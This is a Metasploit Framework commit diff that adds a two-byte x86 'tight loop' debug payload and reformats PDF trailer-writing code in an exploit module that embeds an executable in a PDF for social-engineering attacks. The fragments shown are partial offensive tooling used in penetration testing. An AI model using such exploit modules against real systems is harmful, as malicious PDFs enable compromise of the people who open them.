add payload/generic/tight_loop - x86 debug payload

git-svn-id: file:///home/svn/framework3/trunk@9070 4d416f70-5f16-0410-b530-b9f4589650da
2010-04-14 07:40:04 +00:00 · 2010-04-14 07:40:04 +00:00 · 321404e2fe
parent 56d50d6794
commit 321404e2fe
2 changed files with 41 additions and 3 deletions
--- a/modules/exploits/windows/fileformat/adobe_pdf_embedded_exe.rb
+++ b/modules/exploits/windows/fileformat/adobe_pdf_embedded_exe.rb
@ -67,8 +67,7 @@ class Metasploit3 < Msf::Exploit::Remote
 		trailers	= pdf_objects[1]
 		startxrefs	= pdf_objects[2]
 		root_obj	= pdf_objects[3]
-
-
+		
 		output = basic_social_engineering_exploit(xref_trailers,root_obj,stream,trailers,file_name,exe_name,startxrefs.last)

 		print_status("Creating '#{datastore['FILENAME']}' file...")
@ -339,7 +338,11 @@ class Metasploit3 < Msf::Exploit::Remote
 			if trailers[0].has_key?("ID")
 				new_pdf << "xref\r\n" << xrefs << "trailer\r\n<</Size #{new_size}/Prev #{startxref}/Root #{trailers[0].fetch("Root")} R/Info #{trailers[0].fetch("Info")} R/ID#{trailers[0].fetch("ID")}>>\r\n"
 			else
-				new_pdf << "xref\r\n" << xrefs << "trailer\r\n<</Size #{new_size}/Prev #{startxref}/Root #{trailers[0].fetch("Root")} R/Info #{trailers[0].fetch("Info")} R>>\r\n"
+				new_pdf << "xref\r\n" << xrefs 
+				new_pdf << "trailer\r\n"
+				new_pdf << "<</Size #{new_size}/Prev #{startxref}"
+				new_pdf << "/Root #{trailers[0].fetch("Root")} R"
+				new_pdf << "/Info #{trailers[0].fetch("Info")} R>>\r\n"
 			end

 			new_pdf << "startxref\r\n#{stream.length + pdf_payload.length + new_page.length + new_catalog.length}\r\n%%EOF\r\n"
--- a/modules/payloads/singles/generic/tight_loop.rb
+++ b/modules/payloads/singles/generic/tight_loop.rb
@ -0,0 +1,35 @@
+##
+# $Id$
+##
+
+##
+# This file is part of the Metasploit Framework and may be subject to 
+# redistribution and commercial restrictions. Please see the Metasploit
+# Framework web site for more information on licensing and terms of use.
+# http://metasploit.com/framework/
+##
+
+require 'msf/core'
+require 'msf/core/payload/generic'
+
+module Metasploit3
+
+	include Msf::Payload::Single
+
+	def initialize(info = {})
+		super(merge_info(info,
+			'Name'          => 'Generic x86 Tight Loop',
+			'Version'       => '$Revision$',
+			'Description'   => 'Generate a tight loop in the target process',
+			'Author'        => 'jduck',
+			'Platform'	    => [ 'win', 'linux', 'bsd', 'solaris', 'bsdi', 'osx' ],
+			'License'       => MSF_LICENSE,
+			'Arch'		    => ARCH_X86,
+			'Payload'	    =>
+				{
+					'Payload' => "\xeb\xfe" # jump to self
+				}
+			))
+	end
+
+end